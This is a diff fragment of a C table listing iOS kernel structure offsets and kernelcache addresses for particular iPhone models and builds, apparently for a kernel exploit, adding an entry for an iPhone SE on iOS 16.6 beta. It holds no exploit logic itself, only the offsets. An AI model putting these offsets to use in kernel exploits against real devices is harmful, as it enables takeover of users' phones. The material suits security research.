.vm_map_entry__store__entry__rbe_left = 0x20, - .vm_map_entry__store__entry__rbe_right = 0x28, - .vm_map_entry__store__entry__rbe_parent 
= 0x30, - .vnode__v_un__vu_specinfo = 0x78, - ._vm_map__hdr__links__prev = 0x00 + 0x10, - ._vm_map__hdr__links__next = 0x08 + 0x10, - ._vm_map__hdr__links__start = 0x10 + 0x10, - ._vm_map__hdr__links__end = 0x18 + 0x10, - ._vm_map__hdr__nentries = 0x30, - ._vm_map__hdr__rb_head_store__rbh_root = 0x38, - ._vm_map__pmap = 0x40, - ._vm_map__hint = 0x90 + 0x08, - ._vm_map__hole_hint = 0x90 + 0x10, - ._vm_map__holes_list = 0x90 + 0x18, - ._vm_map__object_size = 0xc0, - .kernelcache__kernel_base = 0xfffffff007004000, - .kernelcache__cdevsw = 0xfffffff00a47dab0, - .kernelcache__gPhysBase = 0xfffffff0079541b8, - .kernelcache__gPhysSize = 0xfffffff0079541b8 + 8, - .kernelcache__gVirtBase = 0xfffffff007952370, - .kernelcache__perfmon_devices = 0xfffffff00a4bd520, - .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, - .kernelcache__ptov_table = 0xfffffff0079079b8, - .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, - .kernelcache__vm_pages = 0xfffffff007904100, - .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, - .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4bc908, - .kernelcache__vn_kqfilter = 0xfffffff007f56588, - }, //iPhone 12 mini 16.1.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:34:22 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8101", 
@@ -263,6 +183,86 @@ const struct dynamic_info kern_versions[] = { .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fa970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3db778, .kernelcache__vn_kqfilter = 0xfffffff007f1da7c, + }, + //iPhone SE 2020 iOS 16.6 beta1 + { + .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", + .fileglob__fg_ops = 0x28, + .fileglob__fg_data = 0x40 - 8, + .fileops__fo_kqfilter = 0x30, + // .fileproc__fp_iocount = 0x0000, + // .fileproc__fp_vflags = 0x0004, + // .fileproc__fp_flags = 0x0008, + // .fileproc__fp_guard_attrs = 0x000a, + // .fileproc__fp_glob = 0x0010, + // .fileproc__fp_guard = 0x0018, + // .fileproc__object_size = 0x0020, + .fileproc_guard__fpg_guard = 0x8, + .kqworkloop__kqwl_state = 0x10, + .kqworkloop__kqwl_p = 0x18, + .kqworkloop__kqwl_owner = 0xd0, + .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, + .kqworkloop__object_size = 0x108, + .pmap__tte = 0x0, + .pmap__ttep = 0x8, + .proc__p_list__le_next = 0x0, + .proc__p_list__le_prev = 0x8, + .proc__p_pid = 0x60, + .proc__p_fd__fd_ofiles = 0xf8, + .proc__object_size = 0x730, + .pseminfo__psem_usecount = 0x04, + .pseminfo__psem_uid = 0x0c, + .pseminfo__psem_gid = 0x10, + .pseminfo__psem_name = 0x14, + .pseminfo__psem_semobject = 0x38, + // .psemnode__pinfo = 0x0000, + // .psemnode__padding = 0x0008, + // .psemnode__object_size = 0x0010, + .semaphore__owner = 0x28, + .specinfo__si_rdev = 0x18, + .task__map = 0x28, + .task__threads__next = 0x80 - 0x28, + .task__threads__prev = 0x80 - 0x28 + 8, + .task__itk_space = 0x300, + .task__object_size = 0x628, + .thread__task_threads__next = 0x378 - 0x18, + .thread__task_threads__prev = 0x378 - 0x18 + 8, + .thread__map = 0x378, + .thread__thread_id = 0x410, + .thread__object_size = 0x4b8, + .uthread__object_size = 0x200, + .vm_map_entry__links__prev = 0x00, + .vm_map_entry__links__next = 0x08, + .vm_map_entry__links__start = 0x10, + 
.vm_map_entry__links__end = 0x18, + .vm_map_entry__store__entry__rbe_left = 0x20, + .vm_map_entry__store__entry__rbe_right = 0x28, + .vm_map_entry__store__entry__rbe_parent = 0x30, + .vnode__v_un__vu_specinfo = 0x78, + ._vm_map__hdr__links__prev = 0x00 + 0x10, + ._vm_map__hdr__links__next = 0x08 + 0x10, + ._vm_map__hdr__links__start = 0x10 + 0x10, + ._vm_map__hdr__links__end = 0x18 + 0x10, + ._vm_map__hdr__nentries = 0x30, + ._vm_map__hdr__rb_head_store__rbh_root = 0x38, + ._vm_map__pmap = 0x40, + ._vm_map__hint = 0x90 + 0x08, + ._vm_map__hole_hint = 0x90 + 0x10, + ._vm_map__holes_list = 0x90 + 0x18, + ._vm_map__object_size = 0xc0, + .kernelcache__kernel_base = 0xfffffff007004000, + .kernelcache__cdevsw = 0xfffffff00a47dab0, + .kernelcache__gPhysBase = 0xfffffff0079541b8, + .kernelcache__gPhysSize = 0xfffffff0079541b8 + 8, + .kernelcache__gVirtBase = 0xfffffff007952370, + .kernelcache__perfmon_devices = 0xfffffff00a4bd520, + .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, + .kernelcache__ptov_table = 0xfffffff0079079b8, + .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, + .kernelcache__vm_pages = 0xfffffff007904100, + .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, + .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4bc908, + .kernelcache__vn_kqfilter = 0xfffffff007f56588, } };